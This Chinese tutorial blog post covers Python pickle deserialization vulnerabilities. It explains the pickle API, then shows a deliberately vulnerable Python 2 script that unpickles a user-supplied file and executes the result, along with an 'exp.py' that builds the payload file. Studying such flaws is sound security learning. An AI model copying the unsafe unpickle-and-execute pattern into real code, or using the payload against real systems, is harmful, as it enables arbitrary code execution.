【反序列化】Python反序列化之pickle篇

0x01 前言

前兩天在安全客中看了一篇python對(duì)象注入的文章,感覺(jué)寫的很好,就學(xué)習(xí)一下,在此記錄一下。

0x02 Python之pickle

在研究python反序列化漏洞之前,我們需要了解本次研究的主體:pickle模塊
這里主要需要知道4個(gè)方法:
dump()
dumps()
load()
loads()

pickle.dump(obj, file, [protocol])
dump()會(huì)將對(duì)象序列化后寫入一個(gè)文件中,其中,文件需要有write接口,protocol代表的是協(xié)議,當(dāng)protocol=0的時(shí)候表示序列化對(duì)象用可表示的ascii碼寫,當(dāng)protocol=1的時(shí)候代表用二進(jìn)制表示,那么文件就要用wb模式打開,當(dāng)protocol=2的時(shí)候也是用二進(jìn)制表示,在python2.3之后的版本可以使用,會(huì)更高效一些,默認(rèn)protocol=0。

pickle.dumps(obj)
與dump()不同的是,dumps()只是將序列化對(duì)象當(dāng)作字符串返回

pickle.load(file)
load()會(huì)讀入file的內(nèi)容,并將其反序列化為對(duì)象,file的內(nèi)容要求是序列化的內(nèi)容。

pickle.loads(pick_data)
loads()會(huì)將序列化的字符串反序列化為對(duì)象

cPickle與pickle的用法差不多,但是cPickle使用C語(yǔ)言寫的,別pickle更高效,現(xiàn)在大部分都會(huì)使用cPickle來(lái)代替pickle了。

0x03 Python對(duì)象注入之pickle

什么是對(duì)象注入?回想一下之前講PHP反序列化漏洞的時(shí)候的概念,其實(shí)差不多,在pickle中,序列化的過(guò)程是沒(méi)有問(wèn)題的,但是當(dāng)反序列化的過(guò)程中,如果用戶的輸入被傳入unpickling中時(shí),那么就有可能存在對(duì)象注入的風(fēng)險(xiǎn)。

舉個(gè)例子:

import cPickle as pickle
import os, sys

arg = sys.argv[1]

class Test(object):

    def load(self, filenmae=None):
        with open(filenmae, 'rb') as pick_file:
            self.doWork = pickle.load(pick_file)
            self.workDone = self.doWork

    def final_workout(self, unpickled_data):
        self.filename = "code.py"
        self.writeinto = open(self.filename, "w")
        self.writeinto.write(unpickled_data)
        print "Flag = 1"
        self.writeinto.close()
        os.system("python2 {}".format(str(self.filename)))

if __name__ == '__main__':
    test = Test()
    test.load(arg)
    unpickled_data = test.workDone
    test.final_workout(unpickled_data)

這段代碼中,首先他有一個(gè)接受用戶輸入的功能,并且反序列化了用戶的輸入,并放入一個(gè)叫做code.py腳本中執(zhí)行,那么我們就可以構(gòu)造特定的字符串來(lái)執(zhí)行我們想要的功能。

0x04 漏洞利用編寫

exp.py

import cPickle as pickle

filename = "pickle_data2.txt"
code = "code.txt"

class Test(object):

    def load(self, code):

        self.code = code
        self.readin = open(code, "r")
        self.readin_data = self.readin.read()
        self.done = pickle.dumps(self.readin_data)

    def write_into(self, filename, pickle_data):
        self.writeinto =open(filename, "w")
        self.writeinto.write(pickle_data)
        print "Writing pickle data into the file..."
        self.writeinto.close()

    def read_into(self, filenmae):
        self.filename = filename
        self.readinto = open(filename, "r")
        self.ret_data = self.readinto.read()

        print "\n\n"
        print "Pickle data: \n\n"
        print self.readin_data

if __name__ == '__main__':
    test = Test()
    test.load(code)
    pickle_data = test.done
    test.write_into(filename, pickle_data)
    test.read_into(filename)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 1 前言 在“通過(guò)簡(jiǎn)單示例來(lái)理解什么是機(jī)器學(xué)習(xí)”這篇文章里提到了pickle庫(kù)的使用,本文來(lái)做進(jìn)一步的闡述。 pi...
    leenard閱讀 2,039評(píng)論 0 2
  • http://www.liaoxuefeng.com/wiki/0014316089557264a6b348958...
    喵在野閱讀 346評(píng)論 0 0
  • IO編程概念 IO在計(jì)算機(jī)中指Input/Output,也就是輸入和輸出。由于程序和運(yùn)行時(shí)數(shù)據(jù)是在內(nèi)存中駐留,由C...
    時(shí)間之友閱讀 780評(píng)論 0 0
  • 我們把變量從內(nèi)存中變成可存儲(chǔ)或傳輸?shù)倪^(guò)程稱之為序列化,在Python中叫pickling,在其他語(yǔ)言中也被稱之為s...
    牛崽兒酷閱讀 140評(píng)論 0 0
  • 零號(hào)靜靜地望著面前被車撞得飛出去5米的人。是么,我可以救他。但沒(méi)必要,也沒(méi)可能。 他在地上爬行著,留下一道長(zhǎng)長(zhǎng)的血...
    港兒i閱讀 233評(píng)論 0 0

友情鏈接更多精彩內(nèi)容